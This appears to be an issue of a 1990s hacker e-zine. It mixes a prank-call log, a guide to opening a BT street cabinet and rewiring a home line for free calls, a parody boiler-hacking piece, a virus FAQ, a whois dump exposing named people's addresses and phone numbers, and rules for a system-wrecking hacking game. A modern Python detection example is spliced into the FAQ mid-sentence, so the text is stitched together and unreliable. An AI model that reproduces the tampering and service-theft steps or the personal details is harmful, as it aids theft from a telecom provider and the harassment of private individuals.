dk: kathy have you made any attempt to contact any form of law enforcement? manager: no i promise. sulfur: she's lying. dk: kathy, do you know what a digital voice analyzer is? (dk is now completely talking out his ass) manager: no. dk: well we have one connected to a polygraph examiner and its telling us your lying kathy. manager: i swear to you im not lying! sulfur: shoot her dk: kathy your lying. manager: no no im not! dk: your lying kathy, mike, open fire open fire! z: open fire!! manager: LORI!! DUCK!! *click* everyone on the conference call: BAHAHAHAHAHAHAHAHAHA 3. How To Rewire Your House For Free Phone Calls : WildFire (-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-) How To Rewire You House For Free Fone Calls In The U.K (-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-)(-) By WildFire of AWOL The aim is to teach you how to rewire your house to an engineer test line for free Fone calls, you dont need any little coloured boxes etc, all you need is a bit of patience and a lot of guts =) EQUIPMENT -: A B.T line into your house Socket wrench with 1/2 inch bit Offical looking enginner clothing (lumi jacket) C.B radios (Optional) STEP 1: We need to find out some information about the your line (Note : these numbers are not anything to do with your Fone number) what we need to know is how it runs back to B.T Eg. The pole outside your house is the first contact then it runs underground to A big green box, these are called DP's (Disconection/Connection points) Fig 1. House -----> Pole ------> Green box ------> B.T \/ \/ Prefix = 46 95 The way to find this out is by sabotaging your house's fone line to get an engininer to pay you a visit . With him he should bring a nice filo-fax with all his jobs in (all the places he's got to visit and their line info etc.) You now Have 3 options (i) KILL HIM!! 
and steal all his neat stuff * (ii) Act Intrested in his work and ask how he knows which line is yours say you want to do work experience in B.T etc/etc and he might show it to you and even explain it to you. (iii) Sabotage your line in such a way he's got to go up your pole , while he's trying to work out what the fuck you've done have a look at the filo-fax and write down all your info. * Not Recommended There are probally other ways to get your info ie. Bullshiting the B.T depot. or operators but they are not known my me , if anyone has any ideas i'd like to hear from them... STEP 2 : Decode When you have the filo-fax in your hands flick through it, near the end should be a page with your surname and telephone number.. below this should be the following .......... PCP E P DP PR 15 15 360 1922 4 What we are concerned with are the DP, PCP and P DP -- This is the pole, you can check this by going outside and looking at it . PCP/E -- This is the big green box have a look around your neighbourhood not to be confused with cable green boxes !!. P -- This is where your wire-pair are in the green box. The other letters are probally what contact your wire-pair is on the pole etc. Now You're Set To Go On An Adventure .. Wait until darkness falls , Put on your funky glow in the dark jackets, put the socket wrench in your pocket and take a visit to your local greener. Look around for nosey OAP's or other paranoid people. I actually had the shit kicked out of me by a large bloke who thought I was breaking into his house because I was looking very suspect walking around the streets stopping at the end of his road near the green box, ouch! On the front of the box there should be 2 diamond shaped things, pull out the wrench and undo them , the box should now open with ease.. You Should see loads of wires going all over the place. 
On the back of the left door there should be a white box (like the one you plug your fone into back home); this is what the engineer uses for calls and this is what we are going to swap with your house pair.

How To Find Your Pair:
There should be transparent plastic struts going from top to bottom, they have holes (where the wires come through) with very tiny numbers near them. The struts are divided up into hundreds, so if your "P" was 360 you go along to the third strut and down until you find the tiny number 60 next to a hole (see fig 1.18291739). In this hole should be some wires, with luck they should be yours. Pull the wires out of the white box and reconnect it to the wire pair going to your house (the use of radios for checking might be a good idea).

Fig 1.18291739

  100-200  200-300  300-400  400-500  500-600  600-700  700-800  800-900
                      -360

Go home and see if you have a dial tone. Congratulations.... your house is now ready for free calls. Dial 175 and get your new fone number. Your old line will be in limbo so you might as well stop paying line rental, so tell B.T. to disconnect it.

Notes for use:
 - If you're leaving the dodgy line permanent then make sure you hide the wires well.
 - If you are going to get your old line cut off then make sure all your wiring is back as it was before.
 - Don't tell stupid people your number.
 - Don't call operators etc.

When we used this method we only connected the dodgy line when we needed it, so I don't know what will happen if left on a permanent basis ???!"*

The information in this file came from a lot of trial & error so some facts may be incorrect.. (Anyway it worked for us!).

----------- WildFire -----------
----------- AWOL '97 -----------

===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================

1. Hacking Electrical Items Part 2, The Sequel : Tetsu Khan

LAst TiME wE WuZ Hax0Rin' ToAsTAz, So foR Dis TiMe i BeeN ThINkin On WhUT wE ShOUld hAx0R, aNd I ThOUghT, "eYe WiLL WrItE AbOuT....BOiLAhS!!! YeS, ThOsE boILaHs yEw FiNd In yOuR BaSEmEnt!!" AnD So I StArTed To pLaY ArouND WifF Muh BoiLAh AT h0me, NoW Yew caN REwt YoUr BoILah Tew!!!

FiNDiNg OuT dA OS ThaT ThA BoiLaH iZ RuNNiN'
--------------------------------------------
yEw Can DeW ThIS 3 WayZ...

1: LeWk FoR a StIcKA On It DaT Sez.
2: FiNd A CoNsOle On DA BoiLAh, ThEn, If IT hAs A kEYbOArd (DepEndZ oN MaNuFAcTuReR) tYpE "uname -a" AnD It WiLL Tell YeW!
3: FiNd Da ManUaL FoR YouR BOilaH (easiest way)

WhEn YoU KnOw YoUr BoILaHs oPeRATinG SyStEm, yEw cAN PRocEEd To Hax0R It...
---------------------------------------------------------------------------
Hax0RinG a BoILaH KaN BeE VeRy DangERous, LiKE Hax0Rin' A nuKelear PoWaHH sTAtIon, So MaKe sHuRe YeW dO ThE fOLLowiNG...

1: PuT oN PrOtECtivE CloThInG, LikE GloVeS, AnD a hAT, aNd MaYBe a sCarF, tHis Is BeCoS BaSEmEnts CaN bE CooOLD, aNd YEw WouLDnt WanT To CaTch A ChiLL wOULd YeW?
2: MaKE ShURe YeW HaVE A SpAnnEr Or WreNCH, As YoU WiLL NeEd ThEsE tO FiNd hIdDEn pOrTz AnD TeW Eye-PeE SpoOF fRom TruSteD HoStS (liKe a SinK, oR A pIpE, Or A WaSHing MaChInE)

LiKE WiV ToAsTeRz, We wILL fiRsT nEeD tO FiNd HiDDeN PoRtS, So wE NeEd To ScAn FoR tHem, bOilAhz ArE BiGGer tHan tOASterz, sO ThiS MaY tAke SoMe TiMe. YeW cAn LeWk FoR SucH HiDDen PoRtS bY dOIng ThEsE tHinGs...

1: LeWKiNg ArOunD ThE BoILaH wIV yOUR EyeS.
2: TrAcInG PiPeS aLL ArOuND yOuR hOuSe (bit like traceroute programs do)
3: UsInG StEalTh TEkNiquEs By HidInG ArOuND yOuR hOuSE AnD LIsTENinG fOr WaTeR, liKE FrOm TaPs aNd StUFf...

If YoU dOnT FiNd AnY HIdDen PoRtS, ThEN YeW cAN JuST LoGiN FrOM a WaSHiNG MaChIne, Or OtHeR tRUstEd HoSt On ThE NeTwOrK, wHeN yOu COnnEcT tO tHa BoiLaH FRoM tHe WasHiNg MaChINe YeW wiLL sEe sOmeThInG LiKe ThIs...
+-------------------+
| GEneRaL eLeKTrIk  |
| M:0225            |
| S:b4588           |
| T:02              |
+-------------------+

BoiLaH OS RelEasE 2.54 (bIg BaAAadAss BoILaH)

login: BoiLaH
password:            <--- We AttEmPtid ThE DeFauLt "BoiLaH"

------------------------------------------------------------
L0ghINn GRaNTiD ***************
------------------------------------------------------------
WeLKoMe To bOiLAh
[BOPR] bOiLiNg OpErAtIoNS PlaN rEsPonSe
------------------------------------------------------------
login on tty[wAShInG mAcHiNE]
last login from BaTHrEwm.COM on tty[ShOwEr] at 7:43p.m.

1: sHuTDoWn
2: CoLd WaTeR
3: hOt wAtEr
4: UNiX TyPE SheLL ENViRONMEnT

If YeW GhET THiS YEW ArE COOL)(#*$

Ok NoW CHEwZe NuMbAhh 4, ThEn YeWsE ThIS uniVeRSaL BoiLAhh ExPLoiT...

% fuck yew eye am eleet and k-r4d 'cos muh name iz ZeroCool!
fuck : command not found
% whoami
root
%

tHe bEst tImEs To ReWT BoILaHs Is lAtE aT nIgHt WhEn No-OnE Is LOggEd-In, CoS In ThA dAY, yEw GEt uSeRs LoGgEd iN To DoWLoAd WatEr AnD ShIt.

eYe WiLL KoNItuE wItH oTheR ExAMplEs NeXt TiMe!

T_K

2. Virus Definitions : so1o

This is for all you lame fucks out there who say I infect your systems with viruses, even when the only malicious shit I code are Windoze killers, anyway here are a few definitions, just so you know what you're on about next time =)

What are computer viruses (and why should I worry about them)?
--------------------------------------------------------------
According to Fred Cohen's well-known definition, a COMPUTER VIRUS is a computer program that can infect other computer programs by modifying them in such a way as to include a (possibly evolved) copy of itself. Note that a program does not have to perform outright damage (such as deleting or corrupting files) in order to be called a "virus". However, Cohen uses the terms within his definition (e.g. "program" and "modify") a bit differently from the way most anti-virus researchers use them, and classifies as viruses some things which most of us would not consider viruses.

Many people use the term loosely to cover any sort of program that tries to hide its (malicious) function and tries to spread onto as many computers as possible. (See the definition of "Trojan".)

Be aware that what constitutes a "program" for a virus to infect may include a lot more than is at first obvious - don't assume too much about what a virus can or can't do!

These software "pranks" are very serious; they are spreading faster than they are being stopped, and even the least harmful of viruses could be fatal. For example, a virus that stops your computer and displays a message, in the context of a hospital life-support computer, could be fatal. Even those who created the viruses could not stop them if they wanted to; it requires a concerted effort from computer users to be "virus-aware", rather than the ignorance and ambivalence that have allowed them to grow to such a problem.

What is a Trojan Horse?
-----------------------
A TROJAN HORSE is a program that does something undocumented which the programmer intended, but that the user would not approve of if he knew about it. According to some people, a virus is a particular case of a Trojan Horse, namely one which is able to spread to other programs (i.e., it turns them into Trojans too). According to others, a virus that does not do any deliberate damage (other than merely replicating) is not a Trojan. Finally, despite the definitions, many people use the term "Trojan" to refer only to a *non-replicating* malicious program, so that the set of Trojans and the set of viruses are disjoint.

What are the main types of PC viruses?
--------------------------------------
Generally, there are two main classes of viruses. The first class consists of the FILE INFECTORS which attach themselves to ordinary program files. These usually infect arbitrary .COM and/or .EXE programs, though some can infect any program for which execution is requested, such as .SYS, .OVL, .PRG, & .MNU files.

File infectors can be either DIRECT ACTION or RESIDENT. A direct-action virus selects one or more other programs to infect each time the program which contains it is executed. A resident virus hides itself somewhere in memory the first time an infected program is executed, and thereafter infects other programs when *they* are executed (as in the case of the Jerusalem) or when certain other conditions are fulfilled. The Vienna is an example of a direct-action virus. Most other viruses are resident.

The second category is SYSTEM or BOOT-RECORD INFECTORS: those viruses which infect executable code found in certain system areas on a disk which are not ordinary files. On DOS systems, there are ordinary boot-sector viruses, which infect only the DOS boot sector, and MBR viruses which infect the Master Boot Record on fixed disks and the DOS boot sector on diskettes. Examples include Brain, Stoned, Empire, Azusa, and Michelangelo. Such viruses are always resident viruses.

Finally, a few viruses are able to infect both (the Tequila virus is one example). These are often called "MULTI-PARTITE" viruses, though there has been criticism of this name; another name is "BOOT-AND-FILE" virus.

FILE SYSTEM or CLUSTER viruses (e.g. Dir-II) are those which modify directory table entries so that the virus is loaded and executed before the desired program is. Note that the program itself is not physically altered, only the directory entry is. Some consider these infectors to be a third category of viruses, while others consider them to be a sub-category of the file infectors.

What is a stealth virus?
------------------------
A STEALTH virus is one which hides the modifications it has made in the file or boot record, usually by monitoring the system functions used by programs to read files or physical blocks from storage media, and forging the results of such system functions so that programs which try to read these areas see the original uninfected form of the file instead of the actual infected form. Thus the viral modifications go undetected by anti-viral programs. However, in order to do this, the virus must be resident in memory when the anti-viral program is executed.

Example: The very first DOS virus, Brain, a boot-sector infector, monitors physical disk I/O and re-directs any attempt to read a Brain-infected boot sector to the disk area where the original boot sector is stored. The next viruses to use this technique were the file infectors Number of the Beast and Frodo (= 4096 = 4K).

Countermeasures: A "clean" system is needed so that no virus is present to distort the results. Thus the system should be built from a trusted, clean master copy before any virus-checking is attempted; this is "The Golden Rule of the Trade." With DOS, (1) boot from original DOS diskettes (i.e. DOS Startup/Program diskettes from a major vendor that have been write-protected since their creation); (2) use only tools from original diskettes until virus-checking has completed.

What is a polymorphic virus?
----------------------------
A POLYMORPHIC virus is one which produces varied (yet fully operational) copies of itself, in the hope that virus scanners will not be able to detect all instances of the virus.

One method to evade signature-driven virus scanners is self-encryption with a variable key; however these viruses (e.g. Cascade) are not termed "polymorphic," as their decryption code is always the same and thus can be used as a virus signature even by the simplest, signature-driven virus scanners (unless another virus or program uses the identical decryption routine).

One method to make a polymorphic virus is to choose among a variety of different encryption schemes requiring different decryption routines: only one of these routines would be plainly visible in any instance of the virus (e.g. the Whale virus). A signature-driven virus scanner would have to use several signatures (one for each possible encryption method) to reliably identify a virus of this kind.

A more sophisticated polymorphic virus (e.g. V2P6) will vary the sequence of instructions in its copies by interspersing it with "noise" instructions (e.g. a No Operation instruction, or an instruction to load a currently unused register with an arbitrary value), by interchanging mutually independent instructions, or even by using various instruction sequences with identical net effects (e.g. Subtract A from A, and Move 0 to A). A simple-minded, signature-based virus scanner would not be able to reliably identify this sort of virus; rather, a sophisticated "scanning engine" has to be constructed after thorough research into the particular virus.

The most sophisticated form of polymorphism discovered so far is the MtE "Mutation Engine" written by the Bulgarian virus writer who calls himself the "Dark Avenger". It comes in the form of an object module. Any virus can be made polymorphic by adding certain calls to the assembler source code and linking to the mutation-engine and random-number-generator modules.

The advent of polymorphic viruses has rendered virus-scanning an ever more difficult and expensive endeavor; adding more and more search strings to simple scanners will not adequately deal with these viruses.

What is a companion virus?
--------------------------
A COMPANION virus is one which, instead of modifying an existing file, creates a new program which (unknown to the user) gets executed by the command-line interpreter instead of the intended program. (On exit, the new program executes the original program so that things will appear normal.)
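Going back to the polymorphic-virus section above: the following is an added example, not part of the FAQ text and modelled on no real virus or scanner. It builds a toy decryptor-stub instruction set (the opcodes, the stand-in BODY string and the key range 0x40..0x7F are all constructed), generates Cascade-style copies (constant decryptor, variable key) and polymorphic copies (noise instructions interleaved, an equivalent two-instruction key load swapped in), and then scans both sets two ways: a plain string scan with a wildcard for the key byte, and a scan that first runs the stub in a small emulator and matches on the decrypted body. Emulation is the standard way a "scanning engine" defeats this kind of variation; the page calls for such an engine but does not name the technique.

```python
"""Signature scanning against self-encrypting and polymorphic decryptor stubs.

Added example: the instruction set, the stand-in 'virus body' and the
scanners below are all constructed for illustration and model no real
virus, CPU or anti-virus product.
"""
import random

# Constructed one-byte opcodes of the toy decryptor stub.
NOP   = 0x00   # NOP        : does nothing (usable as noise)
LOADK = 0x10   # LOADK kk   : key register K = kk
XORK  = 0x11   # XORK  mm   : K ^= mm        (LOADK a ; XORK b  ==  LOADK a^b)
XORB  = 0x20   # XORB       : decrypt the body by XORing every byte with K
LOADG = 0x30   # LOADG gg   : load an unused register (noise)
END   = 0xFF   # END        : end of stub; the encrypted body follows

# Constructed stand-in for the plaintext virus body.  Keys and noise operands
# are kept in 0x40..0x7F so that 0xFF occurs only as END and the toy stays
# unambiguous to parse (body bytes XORed with such a key never reach 0xFF).
BODY = b"SAMPLE-BODY: infect *.COM files; show message on Friday the 13th"


def _xor(data, key):
    return bytes(b ^ key for b in data)


def cascade_style(key):
    """Self-encrypting only: the body changes with the key, but the decryptor
    LOADK kk ; XORB ; END is byte-identical in every copy."""
    assert 0x40 <= key < 0x80
    return bytes([LOADK, key, XORB, END]) + _xor(BODY, key)


def polymorphic(key, rng):
    """Same net effect as cascade_style(), but the stub is rewritten per copy:
    noise instructions are interleaved (at least one unit at each position)
    and LOADK is sometimes replaced by the equivalent pair LOADK k^m ; XORK m."""
    assert 0x40 <= key < 0x80

    def noise():
        out = bytearray()
        for _ in range(rng.randrange(1, 4)):
            if rng.random() < 0.5:
                out.append(NOP)
            else:
                out += bytes([LOADG, rng.randrange(0x40, 0x80)])
        return bytes(out)

    if rng.random() < 0.5:
        load = bytes([LOADK, key])
    else:
        mask = rng.randrange(0x40, 0x80)
        load = bytes([LOADK, key ^ mask, XORK, mask])
    stub = noise() + load + noise() + bytes([XORB]) + noise() + bytes([END])
    return stub + _xor(BODY, key)


def emulate(sample):
    """Run the stub in a tiny interpreter and return the body it decrypts,
    i.e. what a generic-decryption scanning engine recovers before matching."""
    k, i, decrypt = 0, 0, False
    while True:
        op = sample[i]
        if op == NOP:
            i += 1
        elif op == LOADK:
            k, i = sample[i + 1], i + 2
        elif op == XORK:
            k, i = k ^ sample[i + 1], i + 2
        elif op == LOADG:
            i += 2
        elif op == XORB:
            decrypt, i = True, i + 1
        elif op == END:
            body = sample[i + 1:]
            return _xor(body, k) if decrypt else body
        else:
            raise ValueError("unknown opcode 0x%02x at offset %d" % (op, i))


# The signature a string scanner would extract from cascade_style() copies:
# the constant stub with the variable key byte wildcarded (None).
STUB_SIGNATURE = [LOADK, None, XORB, END]
# What the scanning engine looks for in the *decrypted* body instead.
BODY_SIGNATURE = b"infect *.COM"


def matches_signature(sample, sig=STUB_SIGNATURE):
    """Plain string scan with single-byte wildcards."""
    for off in range(len(sample) - len(sig) + 1):
        if all(s is None or s == sample[off + j] for j, s in enumerate(sig)):
            return True
    return False


def matches_after_emulation(sample):
    return BODY_SIGNATURE in emulate(sample)


def demo(seed=1997, n=20):
    """Scan n self-encrypting and n polymorphic copies both ways."""
    rng = random.Random(seed)
    plain = [cascade_style(rng.randrange(0x40, 0x80)) for _ in range(n)]
    poly = [polymorphic(rng.randrange(0x40, 0x80), rng) for _ in range(n)]
    return {
        "cascade_by_signature": sum(map(matches_signature, plain)),
        "poly_by_signature": sum(map(matches_signature, poly)),
        "cascade_by_emulation": sum(map(matches_after_emulation, plain)),
        "poly_by_emulation": sum(map(matches_after_emulation, poly)),
        "distinct_poly_stubs": len({s[:s.index(END) + 1] for s in poly}),
    }


if __name__ == "__main__":
    for name, count in demo().items():
        print("%-22s %d" % (name, count))
```

The wildcard signature catches every Cascade-style copy because the decryptor never changes, and catches none of the polymorphic copies because a noise instruction always separates XORB from END; the emulating scanner catches all of both, since the decrypted body is the same whatever the stub looks like. In the real thing the emulator is a CPU model rather than five opcodes, but the division of labour is the same.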
The only way this has been done so far is by creating an infected .COM file with the same name as an existing .EXE file. Note that those integrity checkers which look only for *modifications* in *existing* files will fail to detect such viruses. (Note that not all researchers consider this type of malicious code to be a virus, since it does not modify existing files.)

Miscellaneous Jargon and Abbreviations
--------------------------------------
BSI = Boot Sector Infector: a virus which takes control when the computer attempts to boot (as opposed to a file infector).

CMOS = Complementary Metal Oxide Semiconductor: a memory area that is used in AT and higher class PCs for storage of system information. CMOS is battery backed RAM (see below), originally used to maintain date and time information while the PC was turned off. CMOS memory is not in the normal CPU address space and cannot be executed. While a virus may place data in the CMOS or may corrupt it, a virus cannot hide there.

DOS = Disk Operating System. We use the term "DOS" to mean any of the MS-DOS, PC-DOS, or DR DOS systems for PCs and compatibles, even though there are operating systems called "DOS" on other (unrelated) machines.

MBR = Master Boot Record: the first absolute sector (track 0, head 0, sector 1) on a PC hard disk, that usually contains the partition table (but on some PCs may simply contain a boot sector). This is not the same as the first DOS sector (logical sector 0).

RAM = Random Access Memory: the place programs are loaded into in order to execute; the significance for viruses is that, to be active, they must grab some of this for themselves. However, some virus scanners may declare that a virus is active simply when it is found in RAM, even though it might be simply left over in a buffer area of RAM rather than truly being active.

TOM = Top Of Memory: the end of conventional memory, an architectural design limit at the 640K mark on most PCs. Some early PCs may not be fully populated, but the amount of memory is always a multiple of 64K. A boot-record virus on a PC typically resides just below this mark and changes the value which will be reported for the TOM to the location of the beginning of the virus so that it won't get overwritten. Checking this value for changes can help detect a virus, but there are also legitimate reasons why it may change. A very few PCs with unusual memory managers/settings may report in excess of 640K.

TSR = Terminate but Stay Resident: these are PC programs that stay in memory while you continue to use the computer for other purposes; they include pop-up utilities, network software, and the great majority of viruses. These can often be seen using utilities such as MEM, MAPMEM, PMAP, F-MMAP and INFOPLUS.

3. Fun With whois, sinnerz.com : so1o

Lewk WhuT eyE FoUnd...

phish:~> whois sinerz.com
[rs.internic.net]

SIN (SINNERZ3-DOM)
   130 105th Ave. S.E. Apt. 218
   Bellevue, Wa 98004
   USA

   Domain Name: SINNERZ.COM

   Administrative Contact:
      Kimminau, Suzette  (SK2455)  evilchic@NWLINK.COM
      (206)454-7176
   Technical Contact, Zone Contact:
      Schmittel, Blair  (BS469)  blair@CYBER-NAUT.COM
      (801)654-3139

   Record last updated on 26-Mar-97.
   Record created on 26-Mar-97.

   Domain servers in listed order:

   STRECH.CYBER-NAUT.COM        192.41.77.5
   ITIS.EASILINK.COM            192.41.78.2

The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

phish:~> fwhois sinnerz.com@nic.ddn.mil
[nic.ddn.mil]
No match for "SINNERZ.COM".

Please be advised that this whois server only contains DOD Information.
All INTERNET Domain, IP Network Number, and ASN records are kept in the
Internet Registry, RS.INTERNIC.NET.

-------------------------------------------------------------------------------
=--> S.I.N : [S]cared sh[I]tless lame fucks not-so-a[N]onymous. <--=
-------------------------------------------------------------------------------

If sIn play this down as fake, why not phone up Evil Chic and ask if Suzey is there? You will soon find out the truth =)

Expect details of all sIn members soon.

4. Hacking Space Shuttles, Abort Codes : NailGun

Okay, if you ever decide to hack a space shuttle (*.arc.nasa.gov is hacked very frequently) and you actually plan it all out, make sure you collect all the parts of this "mini-guide" of little things that are important and you will need to know. This section concerns....

SPACE SHUTTLE ABORT MODES
-------------------------
Space Shuttle launch abort philosophy aims toward safe and intact recovery of the flight crew, orbiter and its payload. Abort modes include:

 * Abort-To-Orbit (ATO) -- Partial loss of main engine thrust late enough to permit reaching a minimal 105-nautical mile orbit with orbital maneuvering system engines.

 * Abort-Once-Around (AOA) -- Earlier main engine shutdown with the capability to allow one orbit around before landing at Edwards Air Force Base, Calif.; White Sands Space Harbor (Northrup Strip), N.M.; or the Shuttle Landing Facility (SLF) at Kennedy Space Center, Fla.

 * Trans-Atlantic Abort Landing (TAL) -- Loss of two main engines midway through powered flight would force a landing at Banjul, The Gambia; Ben Guerir, Morocco; or Moron, Spain.

 * Return-To-Launch-Site (RTLS) -- Early shutdown of one or more engines and without enough energy to reach Banjul would result in a pitch around and thrust back toward KSC until within gliding distance of the SLF.

STS-35 contingency landing sites are Edwards AFB, White Sands, Kennedy Space Center, Banjul, Ben Guerir and Moron.

Next time we will probably look at the payloads of space shuttles, l8r.

5. Country Domain Listing : SirLance

Listing Of Domains By Country, like *.fr *.uk etc. etc.
AD - Andorra - Andorre
AE - Imarata al Arabiya al Muttahidah - Ittihad al Imirat al Arabiya - United Arab Emirates
AF - Afghanistan - Afghanestan
AG - Antigua and Barbuda
AI - Anguilla
AL - Shqipëria - Albania
AM - Armenia - Hayastan
AN - Netherlands Antilles - Nederlandse Antillen
AO - Angola
AQ - Antarctica
AR - Argentina
AS - American Samoa
AT - Austria - Osterreich
AU - Australia
AW - Aruba
AZ - Azerbaijan - Azerbaycan
BA - Bosnia and Herzegovina - Bosna i Hercegovina
BB - Barbados
BD - Bangladesh
BE - Belgium - Belgique - Belgie
BF - Burkina Faso
BG - Bulgaria
BH - Bahrain - Bahrayn
BI - Burundi
BJ - Benin
BM - Bermuda
BN - Brunei
BO - Bolivia
BR - Brazil - Brasil
BS - Bahamas
BT - Bhutan
BV - Bouvet Island - Bouvetoya
BW - Botswana
BY - Belarus - Byelarus'
BZ - Belize
CA - Canada
CC - Cocos (Keeling) Islands (Australia)
CF - Central African Republic
CG - Congo
CH - Switzerland - Schweiz - Suisse - Svizzera - Svizra - Helvetia
CI - Cote d'Ivoire
CK - Cook Islands
CL - Chile
CM - Cameroon
CN - China
CO - Colombia
CR - Costa Rica
CS - Czechoslovakia (former)
CU - Cuba
CV - Cape Verde - Cabo Verde
CX - Christmas Island (Australia)
CY - Cyprus
CZ - Czech Republic - Cechy
DD - Germany (former East Germany) - Deutschland
DE - Germany - Deutschland
DJ - Djibouti
DK - Denmark - Danmark
DM - Dominica
DO - Dominican Republic - Republica Dominicana
DZ - Algeria - Jaza'ir
EC - Ecuador
EE - Estonia - Eesti
EG - Egypt - Misr
EH - Western Sahara
ER - Eritrea
ES - Spain - Espana
ET - Ethiopia - Ityop'iya
FI - Finland - Suomi
FJ - Fiji
FK - Falkland Islands
FM - Micronesia
FO - Faroe Islands - Foroyar
FR - France
FX - Metropolitan France
GA - Gabon
GB - United Kingdom
GD - Grenada
GE - Georgia - Sak'art'velo
GF - French Guiana - Guyane
GH - Ghana
GI - Gibraltar (UK)
GL - Greenland - Kalaallit Nunaat
GM - The Gambia
GN - Guinea - Guinee
GP - Guadeloupe (France)
GQ - Equatorial Guinea - Guinea Ecuatorial
GR - Greece - Ellas
GS - South Georgia and the South Sandwich Islands
GT - Guatemala
GU - Guam
GW - Guinea-Bissau - Guine-Bissau
GY - Guyana
HK - Hong Kong (UK)
HM - Heard Island and McDonald Islands (Australia)
HN - Honduras
HR - Croatia - Hrvatska
HT - Haiti
HU - Hungary - Magyarorszag
ID - Indonesia
IE - Ireland - Éire
IL - Israel - Yisra'el
IN - India - Bharat
IO - British Indian Ocean Territory (UK)
IQ - Iraq
IR - Iran
IS - Iceland - Ísland
IT - Italy - Italia
JM - Jamaica
JO - Jordan - Urdun
JP - Japan
KE - Kenya
KG - Kyrgyzstan
KH - Cambodia - Kampuchea
KI - Kiribati
KM - Comoros - Comores
KN - Saint Kitts and Nevis
KP - Korea (North) - Choson
KR - Korea (South)
KW - Kuwait - Kuwayt
KY - Cayman Islands
KZ - Kazakhstan
LA - Laos
LB - Lebanon - Lubnaniyah
LC - Saint Lucia
LI - Liechtenstein
LK - Sri Lanka
LR - Liberia
LS - Lesotho
LT - Lithuania - Lietuva
LU - Luxembourg
LV - Latvia - Latvija
LY - Libya - Libiya
MA - Morocco - Maghrib
MC - Monaco
MD - Moldova
MG - Madagascar
MH - Marshall Islands
MK - Macedonia - Makedonija
ML - Mali
MM - Burma - Myanma
MN - Mongolia - Mongol Uls
MO - Macau
MP - Northern Mariana Islands
MQ - Martinique (France)
MR - Mauritania - Muritaniyah
MS - Montserrat
MT - Malta
MU - Mauritius
MV - Maldives
MW - Malawi
MY - Malaysia
MZ - Mozambique - Mocambique
NA - Namibia
NC - New Caledonia - Nouvelle-Caledonie
NE - Niger
NF - Norfolk Island (Australia)
NG - Nigeria
NI - Nicaragua
NL - Netherlands - Nederland
NO - Norway - Norge
NP - Nepal
NR - Nauru
NU - Niue
NZ - New Zealand
OM - Oman - Uman
PA - Panama
PE - Peru
PF - French Polynesia - Polynesie Francaise
PG - Papua New Guinea
PH - Philippines - Pilipinas
PK - Pakistan
PL - Poland - Polska
PM - Saint-Pierre et Miquelon
PN - Pitcairn Islands
PR - Puerto Rico
PT - Portugal
PW - Palau - Belau
PY - Paraguay
QA - Qatar
RE - Reunion
RO - Romania
RU - Russia - Rossiya
RW - Rwanda
SA - Saudi Arabia - Arabiya as Suudiyah
SB - Solomon Islands
SC - Seychelles
SD - Sudan
SE - Sweden - Sverige
SG - Singapore - Singapura
SH - Saint Helena (UK)
SI - Slovenia - Slovenija
SJ - Svalbard og Jan Mayen
SK - Slovakia - Slovensko
SL - Sierra Leone
SM - San Marino
SN - Senegal
SO - Somalia
SR - Suriname
ST - Sao Tome e Principe
SU - Soviet Union (former) - Sovietskiy Soyuz
SV - El Salvador
SY - Syria - Suriyah
SZ - Swaziland
TC - Turks and Caicos Islands
TD - Chad - Tchad
TF - French Southern and Antarctic Lands - Terres Australes et Antarctiques
TG - Togo
TH - Thailand
TJ - Tajikistan - Tojikiston
TK - Tokelau (New Zealand)
TM - Turkmenistan - Tiurkmenostan
TN - Tunisia - Tunis
TO - Tonga
TP - East Timor
TR - Turkey - Turkiye
TT - Trinidad and Tobago
TV - Tuvalu
TW - Taiwan - T'ai-wan
TZ - Tanzania
UA - Ukraine - Ukrayina
UG - Uganda
UM - United States Minor Outlying Islands
US - United States of America
UY - Uruguay
UZ - Uzbekistan - Uzbekiston
VA - Holy See (Vatican City)
VC - Saint Vincent and the Grenadines
VE - Venezuela
VG - Virgin Islands (UK)
VI - Virgin Islands (USA)
VN - Vietnam - Viet Nam
VU - Vanuatu
WF - Wallis et Futuna
WS - Samoa
YD - Yemen (former South Yemen)
YE - Yemen
YT - Mayotte (France)
YU - Yugoslavia
ZA - South Africa
ZM - Zambia
ZR - Zaire
ZW - Zimbabwe

===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================

1. CoreWars : so1o / od|phreak

od|phreak was telling me about an idea he had, then called just "Hacker Wars". It was about teams, or groups of hackers who had a league system and hacked each other's systems to gain points... We both made sets of rules and decided on a name also, CoreWars... Here are the rules as to date:

- 6 hackers per team.
- Each team has 2 systems.
- The systems must run linux, and be up 24/7.
- The game is played from a friday at midnight to a sunday at midnight (48 hours).
- On systems owned by the team, each user may have one account, with any system privileges.
- Each team has 1 account on each enemy system
   - 2.5mb quota per account
   - must be a normal user

Rules :
-------
- super users on opposing teams are NOT allowed to intervene with other hackers, this includes killing, writing to their terminals, or disturbing them in any way shape or form, however, super users are allowed to use snoop and other programs to monitor opposing team members, but they cannot DIRECTLY step in and kill the user. super users CANNOT delete files created by the opposing team members, however they ARE allowed to delete files if they have been MODIFIED, like /etc/motd.

- teams conquer a system by forcing it to be shut down, switched off, or any other measure that prevents persons from connecting or using that system. This can include rm'ing the hard drive or any other suitable measure.

The Winning Team Is The Last Team With A System That Has Not Been Shut Down.

  if you shut a system down           : 100 points
  if your system gets shut down       : -50 points
  if you keep both of your systems up :  25 points
  if you lose both of your systems    : -25 points

On Sunday midnight, all points are worked out, and the league positions are calculated.

These Rules Are Currently Being Changed : http://www.neonunix.org/corewars/

Suggestions to myself or od|phreak... So, if you have a team of 6 that you would like to enter in CoreWars, mail corewars@ with your team name, details, system IP and other relevant information...

2. Technophoria Want A Piece Of CodeZero Too? : so1o

Technophoria, based at www.technophoria.com, did *NOT* hack our webpage at www.neonunix.org/codezero/ as I don't even have a l/p to neonunix.org; anyway, they uploaded this shiznit to the page, obviously with neonunix's account, which is the only one on the system...

Dont talk shit about Technophoria


-Particle Man

Hmmm, who the fuck is Particle Man?! Last time I checked the Technophoria member list it had...

  Deprave
  BroncBuster
  Sludge
  Acid Angel
  Modify
  The Messiah
  Banshee

